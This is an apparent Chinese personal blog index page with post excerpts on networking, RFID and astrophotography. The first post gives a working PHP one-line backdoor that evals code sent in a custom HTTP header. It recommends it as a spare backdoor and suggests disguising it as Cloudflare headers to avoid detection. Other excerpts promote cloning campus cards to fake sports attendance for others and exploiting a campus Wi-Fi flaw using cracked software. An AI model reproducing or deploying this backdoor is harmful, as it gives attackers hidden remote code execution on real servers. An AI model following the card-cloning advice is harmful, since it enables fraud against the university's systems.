Ap Blog

Cold code, warm soul.

@Aploium3年前

12/29
17:29
网络

在自定义HTTP header中发送的PHP一句话

最常规的一句话是通过POST发送的,已经被狗狗咬得差不多了。后来也有了UA一句话和Referer一句话,但是随着它们开始被广泛应用,估计也活不长…..orz

昨天突然想到可以用自定义header来发送一句话

服务端php代码:

<?php
/*在php里写的header必须是大写*/
eval($_SERVER["HTTP_GREPLAOWEISUO"]);
?>

攻击者发送带有自定义header的请求:
php_demo

结果:

php-backdoor-result

当然不能用在菜刀上,不过可以当成是备用后门用

进一步.为了保险,可以把自定义header改成某些cdn常见的header,比如说

CF-Connecting-IP
CF-RAY
CF-Visitor

这种coludflare的转发头
请求方式也可以是POST/DELETE/TRACE什么的

/*Grep是我某只小基友*/

在自定义HTTP header中发送的PHP一句话

@Aploium3年前

06/19
22:53
天文

试图用手机拍延时

由于Aploium想拍高质量的星轨,又没有单反,所以打算用手机来拍摄。

于是用了简单的方案解决了手机超长时间延时拍摄的电量和数据存储问题。

拍摄软件用大名鼎鼎的Lapse It Time Lapse

需求是以每2秒一帧的频率,每张照片3MB,连续拍摄8小时,没有外部wifi和电源供应,不能触碰拍照手机。(即 1.5MB/s , 42.2GB总)

tumb

不是我拍的

Read More →

试图用手机拍延时

@Aploium3年前

05/5
09:46
RFID

浙大校园卡克隆技术(阳光体育打卡用)

      体育打卡真是不爽aaaaa….恩….目前只刷了5次卡的杯具aploium………….决定稍微偷懒…………

      用手机能非常简单地克隆浙大校园卡,克隆校园卡能正常地刷浙大阳光体育打卡(固定或移动打卡机),在刷卡机看来原卡与克隆卡完全相同,没有安全风险。

      就是说在不影响原卡任何功能的前提下一个人可以刷好多个人的卡……23333WildSmileRunning

浙大校园卡克隆示例

我是一个栗子

“帮我刷卡吧!” “那你自己用什么?” “克隆卡给你就行~”

ONLY Need : 手机 + 3块钱一张的空白卡。

Read More →

浙大校园卡克隆技术(阳光体育打卡用)

@Aploium3年前

05/4
00:14
网络

轻松获得双倍浙大网速 傻瓜式操作 (使用ZJUWLAN承载VPN)

orz…….居然还有人用…….这个是当初年少无知的时候弄的…….(看这个中二病满满的标题就知道了)w(゚Д゚)w
现在登陆器已经失效,是因为把10.5.1.7的VPN服务器硬编码进去了,现在那个VPN的IP已经失效了。所以登陆器也就失效了(其实所谓的登陆器也只是readial的一个壳……….完全没有技术含量)
但是思路还是可行的,自己折腾也的确能成功,也不要用这里面的版本了,太老了。自行搜索新的破解版叭。这篇古老的东西看看思路就好orz


利用一个ZJUWLAN的设计缺陷,可以获得双倍的网速。 不需要插有线,全程只需要ZJUWLAN,全程自动化
现在将这个过程中需要技术的操作全部编程实现傻瓜式操作,只需要浏览一遍教程,下载已经编好的程序→运行 几乎不需要人工操作,仅有的操作也是最简单的,并且程序全程有提示。

双倍浙大网速示例

成品图(30元账号)


只需要下载→安装→运行,就能轻松得到2倍带宽。
Read More →

轻松获得双倍浙大网速 傻瓜式操作 (使用ZJUWLAN承载VPN)